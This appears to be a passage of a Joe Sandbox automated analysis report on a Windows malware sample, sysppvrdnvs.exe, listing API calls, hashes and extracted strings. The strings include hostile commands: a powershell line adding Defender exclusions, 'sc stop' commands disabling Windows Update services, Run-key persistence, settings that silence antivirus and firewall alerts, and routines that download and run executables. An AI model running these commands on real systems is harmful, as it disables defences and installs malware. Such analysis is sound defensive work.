TCP, xrefs: 0040E13B
UDP, xrefs: 0040E158

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89

Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

Analysis Process: sysppvrdnvs.exePID: 7612, Parent PID: 7568COMMON

Execution Graph

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1512
Total number of Limit Nodes:	39

Executed Functions

Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
htons.WS2_32(0000076C), ref: 0040E1E0
inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D

Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

bind.WS2_32(000000FF,?,00000010), ref: 0040E243
lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

239.255.255.250, xrefs: 0040E1EA
X#A, xrefs: 0040E258, 0040E25B

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250$X#A
API String ID: 726339449-2206458040
Opcode ID: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
Opcode Fuzzy Hash: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
Opcode Fuzzy Hash: 619c20c401e2b3364d0528cdac8d914a84e1654cc4efe0891effe822260bbcd9
Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
Opcode Fuzzy Hash: 1abba91ebe41772085043db3870f7912a64bb11f4083ad92eff8d168b7687ff9
Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A

Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040D782
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
GetTickCount.KERNEL32 ref: 0040D7F4
Sleep.KERNEL32(00000001), ref: 0040D814
GetTickCount.KERNEL32 ref: 0040D81A

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99

Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040B45D

Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D

socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
connect.WS2_32(000000FF,?,00000010), ref: 0040B496
getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

Strings

www.update.microsoft.com, xrefs: 0040B467

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
Opcode Fuzzy Hash: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
Opcode Fuzzy Hash: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A

Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8

Function 00407940 Relevance: 287.7, APIs: 103, Strings: 61, Instructions: 749
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000007D0), ref: 0040794E
CreateMutexA.KERNEL32(00000000,00000000,mmn7nnm8na), ref: 0040795D
GetLastError.KERNEL32 ref: 00407969
ExitProcess.KERNEL32 ref: 00407978
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000105), ref: 004079B2
PathFindFileNameW.SHLWAPI(C:\Windows\sysppvrdnvs.exe), ref: 004079BD
wsprintfW.USER32 ref: 004079DA
DeleteFileW.KERNEL32(?), ref: 004079EA
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
wcscmp.NTDLL ref: 00407A13
ExitProcess.KERNEL32 ref: 00407A32

Strings

FirewallDisableNotify, xrefs: 0040824D
AntiVirusDisableNotify, xrefs: 004082AA
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 00407EE4
AntiSpywareOverride, xrefs: 00408155
cmd.exe, xrefs: 00407D60
open, xrefs: 00407D4A
C:\Windows\sysppvrdnvs.exe, xrefs: 004079AB, 004079B8, 004079C9, 00407A79, 00407B6B, 00407C74
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407AA9
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 004081FE
AntiVirusDisableNotify, xrefs: 00408193
Start, xrefs: 00407DAC
open, xrefs: 00407D65
mmn7nnm8na, xrefs: 00407954
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -, xrefs: 00407D40
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407B9B
Start, xrefs: 00407E05
UpdatesOverride, xrefs: 004082C9
UpdatesOverride, xrefs: 004081B2
FirewallOverride, xrefs: 0040822E
SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator, xrefs: 0040802D
C:\Users\user\tbtnds.dat, xrefs: 00408340
UpdatesDisableNotify, xrefs: 004081D1
Start, xrefs: 00407EB7
AntiVirusOverride, xrefs: 00408174
%windir%, xrefs: 00407A44
%s\%s, xrefs: 00407C56
OverrideNotice, xrefs: 00408000
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407CA4
PreventDownload, xrefs: 004080BA
%s\tbtnds.dat, xrefs: 0040833B
AutoUpdateOptions, xrefs: 0040807C
DisableWindowsUpdate, xrefs: 0040805D
Windows Settings, xrefs: 00407AE7, 00407BD9, 00407CE2
SYSTEM\CurrentControlSet\Services\DoSvc, xrefs: 00407E8B
AntiVirusOverride, xrefs: 0040828B
Start, xrefs: 00407F10
sysppvrdnvs.exe, xrefs: 00407A07, 00407A4F, 00407B41, 00407C4A
%s\%s, xrefs: 00407A5B
DisableWindowsUpdate, xrefs: 00407F69
%s\tbtcmds.dat, xrefs: 00408355
NoAutoUpdate, xrefs: 00407FC2
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, xrefs: 00407D5B
SOFTWARE\Microsoft\Security Center, xrefs: 004080E7
Start, xrefs: 00407E5E
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc, xrefs: 00407DD9
AlwaysAutoUpdate, xrefs: 00407FE1
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 00407F3D
AntiSpywareOverride, xrefs: 0040826C
%temp%, xrefs: 00407C3F
UpdatesDisableNotify, xrefs: 004082E8
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 00407F96
SYSTEM\CurrentControlSet\Services\UsoSvc, xrefs: 00407D80
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407E32
%s:Zone.Identifier, xrefs: 004079CE
%userprofile%, xrefs: 004079FC
cmd.exe, xrefs: 00407D45
C:\Users\user\tbtcmds.dat, xrefs: 0040835A
FirewallDisableNotify, xrefs: 00408136
FirewallOverride, xrefs: 00408117
%s\%s, xrefs: 00407B4D
EnableWindowsUpdate, xrefs: 0040809B

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysppvrdnvs.exe$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
API String ID: 4172876685-1718352060
Opcode ID: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
Opcode Fuzzy Hash: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

Function 0040F560 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040F569
srand.MSVCRT ref: 0040F570
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
strlen.NTDLL ref: 0040F59A
mbstowcs.NTDLL ref: 0040F5B1
rand.MSVCRT ref: 0040F5B9
rand.MSVCRT ref: 0040F5CD
wsprintfW.USER32 ref: 0040F5F4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
wsprintfW.USER32 ref: 0040F6F4
DeleteFileW.KERNEL32(?), ref: 0040F704
Sleep.KERNEL32(000003E8), ref: 0040F70F
Sleep.KERNEL32(000007D0), ref: 0040F730
ExitProcess.KERNEL32 ref: 0040F758
DeleteFileW.KERNEL32(?), ref: 0040F76E
CloseHandle.KERNEL32(000000FF), ref: 0040F77B
InternetCloseHandle.WININET(00000000), ref: 0040F788
InternetCloseHandle.WININET(00000000), ref: 0040F795
Sleep.KERNEL32(000003E8), ref: 0040F7A0
rand.MSVCRT ref: 0040F7B5
Sleep.KERNEL32 ref: 0040F7C6
rand.MSVCRT ref: 0040F7CC
rand.MSVCRT ref: 0040F7E0
wsprintfW.USER32 ref: 0040F807
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
wsprintfW.USER32 ref: 0040F844
DeleteFileW.KERNEL32(?), ref: 0040F854
Sleep.KERNEL32(000003E8), ref: 0040F85F
Sleep.KERNEL32(000007D0), ref: 0040F880
ExitProcess.KERNEL32 ref: 0040F8A7
DeleteFileW.KERNEL32(?), ref: 0040F8B6

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
y@, xrefs: 0040F89C, 0040F74D
%temp%, xrefs: 0040F58B
%s:Zone.Identifier, xrefs: 0040F6E8
%s\%d%d.exe, xrefs: 0040F7FB
%s:Zone.Identifier, xrefs: 0040F838
%s\%d%d.exe, xrefs: 0040F5E8

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: y@$%s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 1632876846-3348571888
Opcode ID: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
Opcode Fuzzy Hash: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE

strcmp.NTDLL ref: 0040B880

Strings

0.0.0.0, xrefs: 0040B86E
.10., xrefs: 0040B98B
.192, xrefs: 0040B90E
10., xrefs: 0040B94F
127., xrefs: 0040B891
.127., xrefs: 0040B8CD
.192., xrefs: 0040B92C
192., xrefs: 0040B8F0
.127, xrefs: 0040B8AF
.10, xrefs: 0040B96D

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

